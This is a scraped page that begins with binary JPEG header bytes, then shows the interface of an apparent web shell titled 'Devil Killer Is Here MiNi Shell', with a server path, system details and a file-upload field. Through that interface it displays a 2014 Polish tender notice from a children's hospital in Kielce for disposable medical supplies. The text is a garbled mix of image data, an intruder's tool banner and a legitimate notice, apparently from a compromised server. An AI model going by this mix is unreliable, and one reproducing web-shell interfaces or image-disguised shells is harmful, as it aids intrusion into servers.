JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140225/65556-N-2014.html

<p class="kh_header"><b>Kielce: Zakup i dostawa: sprzętu medycznego jednorazowego użytku, łyżek laryngoskopowych,  papierów Ekg, żeli Ekg i Usg, płynów do myjni, preparatów do chirurgicznego mycia rąk i dezynfekcji, emulsji, pianki do mycia noworodków, środków do mycia i konserwacji stali szlachetnej, detergentów do mycia endoskopów, testów do chlorków w pocie, czujników 
i innych</b><br>
<b>Numer ogłoszenia: 65556 - 2014; data zamieszczenia: 25.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital Dziecięcy im. Władysława Buszkowskiego , ul. Langiewicza 2, 25-381 Kielce, woj. świętokrzyskie, tel. (041) 361 58 17, faks (041) 361 58 17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chok.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa: sprzętu medycznego jednorazowego użytku, łyżek laryngoskopowych,  papierów Ekg, żeli Ekg i Usg, płynów do myjni, preparatów do chirurgicznego mycia rąk i dezynfekcji, emulsji, pianki do mycia noworodków, środków do mycia i konserwacji stali szlachetnej, detergentów do mycia endoskopów, testów do chlorków w pocie, czujników 
i innych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup i dostawa: sprzętu medycznego jednorazowego użytku,łyżek laryngoskopowych, papierów Ekg, żeli Ekg i Usg, płynów do myjni, preparatów do chirurgicznego mycia rąk i dezynfekcji, emulsji, pianki do mycia noworodków, środków do mycia i konserwacji stali szlachetnej, detergentów do mycia endoskopów, testów do chlorków w pocie, czujników i innych wg ilości i asortymentu szczegółowo określonych w formularzach asortymentowo- cenowych podzielonych na części /pakiety/ od nr1 do nr 59 w załączniku nr1 do Specyfikacji Istotnych Warunków Zamówienia:  
Pakiet nr 1- Strzykawki
Pakiet nr 2- Igły
Pakiet nr 3-Łyżki laryngoskopowe
Pakiet nr 4-Papiery i żele do EKG, USG
Pakiet nr5-Przyrządy do przetaczania
Pakiet nr6-Worki do dobowej zbiórki moczu
Pakiet nr7-Elektrody holterowskie
Pakiet nr8-Przyrządy do aspiracji butelek
Pakiet nr9-Trenażer oddechowy
Pakiet nr10-Cewniki dreny
Pakiet nr11-Rurki intubacyjne, prowadnice
Pakiet nr12-Osłona na opakowania z lekami
Pakiet nr13-Płyny do myjni dezynfektora
Pakiet nr14-Uniwersalne woreczki na mocz
Pakiet nr15-Maty przeciw kurzowe
Pakiet nr16-Preparaty do chirurgicznego mycia rąk
Pakiet nr17-Detergenty enzymatyczne do ręcznego mycia
Pakiet nr18-Ostrza chirurgiczne
Pakiet nr19-Pianka do mycia noworodków
Pakiet nr20-Osprzęt do pomp infuzyjnych
Pakiet nr21-Elektrody noworodkowe
Pakiet nr22-Przyrządy do pomp Plum A
Pakiet nr23- Cewniki Trokar, cewniki typu Prymicat
Pakiet nr24-Igły do punkcji lędźwiowej
Pakiet nr25-Igły do biopsji szpiku kostnego
Pakiet nr26-Strzykawki 50ml
Pakiet nr27-Kapturki 1x użytku
Pakiet nr28-Nożyki alergologiczne
Pakiet nr29-Szew pętlowy endoskopowy
Pakiet nr30-Igły do trepanobiopsji
Pakiet nr31-Testy do oznaczania chlorku w pocie
Pakiet nr32-Czyścik do elektrokoagulacji
Pakiet nr33-Zestaw PEG
Pakiet nr34-Zestaw PEG
Pakiet nr35-Zestaw PEG
Pakiet nr36-Testy do myjni dezynfektora
Pakiet nr37-Staplery i endostaplery
Pakiet nr38-Filtry do płynów
Pakiet nr39-Wymiennik ciepła i wilgoci
Pakiet nr40-Staza
Pakiet nr41-Zgłębnik do żywienia
Pakiet nr42-Cewniki tlenowe donosowe
Pakiet nr43-Zestaw do badania ucha
Pakiet nr44-Zestaw do irygacji
Pakiet nr45-Zestaw do toalety jamy ustnej
Pakiet nr46-Płyn nawilżający Respi Flow, worek do zbiórki moczu
Pakiet nr47-Bezigłowe złącze dostępu żylnego
Pakiet nr48-Zestaw do inplantmedu
Pakiet nr49-Czujniki do pomiaru saturacji do pulsoksymetru Nellcor
Pakiet nr50-Zestaw do odsysania w układzie zamkniętym
Pakiet nr51-Resuscytatory oraz części zamienne
Pakiet nr52-Obwody oddechowe do aparatu do znieczulania
Pakiet nr53-Pianka czyszcząco pielęgnująca
Pakiet nr54-Filtry anestezjologiczne
Pakiet nr55-Aparat do precyzyjnego sterowania płynu
Pakiet nr56-Maska o wysokiej koncentracji z zastawką
Pakiet nr57-Bezigłowe porty infuzyjne z drenem
Pakiet nr58-Kranik trójdrożny
Pakiet 59-Czujniki
2.Zamawiający dopuszcza składanie ofert częściowych w zakresie wyszczególnionych powyżej części (pakietów) od  nr1 do nr 59. Każdemu z Wykonawców przysługuje możliwość złożenia oferty na wybrane przez siebie zadanie/a ( pakiet/y). Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
3.W celu potwierdzenia, że oferowany przedmiot zamówienia odpowiada wymaganiom Zamawiającego, Wykonawca winien do oferty  załączyć firmowe materiały informacyjne (katalog, prospekt), w którym winny być zaznaczone informacje potwierdzające spełnienie wymaganych parametrów - użytkowych. Przedmiot zamówienia został szczegółowo przedstawiony w Opisie przedmiotu zamówienia  załącznik Nr 1-pakiet. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w załączniku nr1-pakiet zostaną odrzucone.
5.Przedmiot zamówienia opisany  w pakiecie (części) musi spełniać wymogi  ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr107, poz.679). 
6.Do oferty należy dołączyć nieodpłatnie próbki  celem weryfikacji poprawności przedmiotu zamówienia /zgodnie z zapisem w załączniku pakiet/. Jednocześnie Zamawiający zastrzega możliwość wezwania do złożenia próbek /w przypadku braku zapisu pod pakietem/ celem udokumentowanie parametrów zaoferowanego przedmiotu zamówienia  poprzez złożenie próbek zaoferowanego produktu / w przypadku wątpliwości dotyczących parametrów użytkowych  przedmiotu zamówienia/.
7.Podane ilości są szacunkowym zapotrzebowaniem. Zamawiający zastrzega sobie prawo rezygnacji z zakupu części towaru wynikającym z braku zapotrzebowania lub zmniejszenia zapotrzebowania. Szczegółowe wymagania  dotyczące w/w przedmiotu zamówienia określono w załączniku nr1- pakiet. 
8.Częstotliwość dostaw uzależniona jest od bieżących potrzeb Zamawiającego będzie ustalana na roboczo w trakcie realizacji zamówienia. 
9.Dostawa realizowana będzie na koszt i ryzyko Wykonawcy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6, 33.14.13.20-9, 33.14.12.40-4, 33.71.19.00-6, 24.95.00.00-8, 44.61.90.00-2, 24.96.00.00-1, 33.16.20.00-3, 33.19.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 59.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Na potwierdzenie spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu art.22 ust.1pkt.1-4 załącznik do SIWZ. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia w oparciu o informacje zawarte w złożonych do oferty oświadczeniach</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)w celu potwierdzenia spełnienia tego warunku Wykonawca winien przedłożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie:
Część nr
Wartość brutto zł(PLN)
1
40.000,00
2
12.000,00
3
10.000,00
4
5.000,00
5
50.000,00
6
1.000,00
7
3.000,00
8
20.000,00
9
2.000,00
10
50.000,00
11
15.000,00
12
3.000,00
13
4.000,00
14
1.500,00
15
1.000,00
16
4.000,00
17
100,00
18
1.500,00
19
500,00
20
15.000,00
21
6.000,00
22
50.000,00
23
15.000,00
24
2.000,00
25
10.000,00
26
7.000,00
27
7.000,00
28
1.500,00
29
10.000,00
30
1.000,00
31
15.000,00
32
200,00
33
500,00
34
3.000,00
35
30.000,00
36
4.000,00
37
30.000,00
38
25.000,00
39
500,00
40
1.500,00
41
10.000,00
42
7.000,00
43
600,00
44
5.000,00
45
4.500,00
46
2.000,00
47
2.500,00
48
5.000,00
49
30.000,00
50
15.000,00
51
12.000,00
52
8.000,00
53
100,00
54
15.000,00
55
3.000,00
56
800,00
57
25.000,00
58
10.000,00
59
3.000,00
Spełnienie warunku należy potwierdzić wykazem dostaw (sporządzonym wg załącznika do SIWZ).  Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia w oparciu o informacje zawarte w złożonych do oferty dokumentach.  Zamawiający dopuszcza możliwość spełnienia przez jedną dostawę  więcej niż jednego z ww. warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu art.22 ust.1pkt.1-4 załącznik do SIWZ. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia w oparciu o informacje zawarte w złożonych do oferty oświadczeniach</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu art.22 ust.1pkt.1-4 załącznik do SIWZ. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia w oparciu o informacje zawarte w złożonych do oferty oświadczeniach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdowania się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia, tj. wykazanie opłaconej polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia w oparciu o informacje zawarte w złożonych do oferty dokumentach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a)w celu potwierdzenia spełnienia tego warunku Wykonawca winien przedłożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie:
Część nr
Wartość brutto zł(PLN)
1
40.000,00
2
12.000,00
3
10.000,00
4
5.000,00
5
50.000,00
6
1.000,00
7
3.000,00
8
20.000,00
9
2.000,00
10
50.000,00
11
15.000,00
12
3.000,00
13
4.000,00
14
1.500,00
15
1.000,00
16
4.000,00
17
100,00
18
1.500,00
19
500,00
20
15.000,00
21
6.000,00
22
50.000,00
23
15.000,00
24
2.000,00
25
10.000,00
26
7.000,00
27
7.000,00
28
1.500,00
29
10.000,00
30
1.000,00
31
15.000,00
32
200,00
33
500,00
34
3.000,00
35
30.000,00
36
4.000,00
37
30.000,00
38
25.000,00
39
500,00
40
1.500,00
41
10.000,00
42
7.000,00
43
600,00
44
5.000,00
45
4.500,00
46
2.000,00
47
2.500,00
48
5.000,00
49
30.000,00
50
15.000,00
51
12.000,00
52
8.000,00
53
100,00
54
15.000,00
55
3.000,00
56
800,00
57
25.000,00
58
10.000,00
59
3.000,00
Spełnienie warunku należy potwierdzić wykazem dostaw (sporządzonym wg załącznika do SIWZ);</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru- załącznik nr1 do niniejszej specyfikacji, wypełniona tabela  asortymentowo cenowa w zależności od części zamówienia, w której Wykonawca składa ofertę.
b) Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art.22 ust.1 z wykorzystaniem wzoru stanowiącego załącznik nr2 do specyfikacji.
c) Oświadczenie  w sprawie podwykonawców- zawarte w treści druku oferta /zaznaczyć/,
d) Oświadczenie w trybie art.44 ustawy - zawarte w treści druku oferta,
e) pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
f) zobowiązanie podmiotów wg wzoru stanowiącego załącznik do  SIWZ 
W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien :
a)dostarczyć ofertę, będącą oświadczeniem woli wykonawcy,
b)dostarczyć wypełnioną tabelę (formularz asortymentowo-cenowy), w zależności od części zamówienia, w której Wykonawca składa ofertę,
c)Zaoferować przedmiot zamówienia  zgodny z wymaganiami zawartymi  w załączniku nr1- pakiet /część/,
d)złożyć kopię dokumentów rejestrowych dopuszczających przedmiot zamówienia do obrotu, deklaracja zgodności, certyfikat CE dla oferowanego przedmiotu zamówienia,  zgodnie z  klasą produktu. Zgodnie z wymaganiami określonymi w ustawie z dnia 20 maja 2010r o wyrobach medycznych (Dz. U. Nr 107, poz. 679 ). Dokumenty w/w z wyraźnym zaznaczeniem numeru pakietu i pozycji której dotyczą. W przypadku produktów które nie podlegają cytowanej ustawie należy dołączyć stosowne pisemne oświadczenie oraz kompletne karty charakterystyki produktu wydane przez producenta, aktualne świadectwo rejestracji producenta lub atest jakości z podanym składem. Kosmetyki wprowadzone do obrotu posiadają zgłoszenie do Krajowego Systemu zgodnie z ustawą  z dnia 30.03.2001, posiadają świadectwo PZH  jeżeli dotyczy. Znak CE na instrukcji, opakowaniu handlowym i jeżeli to możliwe na samym wyrobie. 
e)złożyć oświadczenie, że zaoferowany przedmiot zamówienia spełnia wszystkie wymagania wymienione w załączniku nr1- pakiet do  specyfikacji, posiada dopuszczenie zgodnie z obowiązującymi  przepisami prawa, posiada wszelkie wymagane przez przepisy prawa świadectwa, certyfikaty, deklaracje zgodności, atesty itp., oraz  spełnia wszelkie wymagane przez przepisy prawa wymogi.
f)złożyć materiały informacyjne, na podstawie których Zamawiający dokona oceny zgodności oferty z opisem przedmiotu zamówienia: katalogi, prospekty, opisy opracowane przez producenta  w języku polskim, wskazane jest aby parametry techniczne prezentowane w załączonych prospektach odpowiadały parametrom opisanym w załączniku nr1-pakiet. Jeżeli w prospekcie brak opisu danego parametru, dopuszcza się załączenie do oferty innych dokumentów producenta. W przypadku wątpliwości Zamawiający może zażądać dodatkowych dokumentów potwierdzających spełnianie parametrów/ warunków, które zostały określone w załączniku nr1-pakiet. Dokumenty zostaną udostępnione na każde żądanie Zamawiającego.
g)Wszystkie dokumenty wymagane zgodnie z postanowieniami niniejszej Specyfikacji powinny być złożone w języku polskim. Wszelkie dokumenty dołączone w innym języku niż polski powinny być załączone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Zamawiający będzie mógł żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu w przypadku, gdy przedstawiona przez Wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości Zamawiającego, co do jej prawdziwości, a Zamawiający nie będzie mógł sprawdzić jej prawdziwości.
h)dostarczyć próbki:  zgodnie  z zapisem w przedmiocie zamówienia -pakiet , w celu oceny zgodności przedmiotu zamówienia  z opisem w specyfikacji. Próbki należy  starannie opisać, zaznaczyć  pozycję pakietu. Próbki należy złożyć w terminie składania oferty w pokoju nr22 w osobnej kopercie opisanej: Wojewódzki Specjalistyczny Szpital Dziecięcy im. Władysława Buszkowskiego, Pawilon A, pokój nr22, ul. Langiewicza2, 25-381 Kielce, Próbki do przetargu-zakup i dostawa sprzętu 1x u., dot. Pakietu nr. Oprócz opisu w/w należy umieścić nazwę i adres Wykonawcy. Oferta musi być całościowa i musi zawierać cały wymieniony asortyment. Próbki nie podlegają zwrotowi.
Oferta wraz z załącznikami musi być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku przedsiębiorcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze (lub np. w ewidencji działalności gospodarczej). Do oferty należy dołączyć dokument  lub pełnomocnictwo, z których wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli prawo to nie wynika z rejestru. W takiej sytuacji dokument lub pełnomocnictwo muszą być integralną częścią oferty. Brak podpisu na ofercie lub podpisanie oferty przez osobę/y do tego nie upoważnioną/e będzie skutkowało odrzuceniem oferty na podstawie art.89 ust.1 pkt 8 ustawy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/ spółki cywilne):
a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
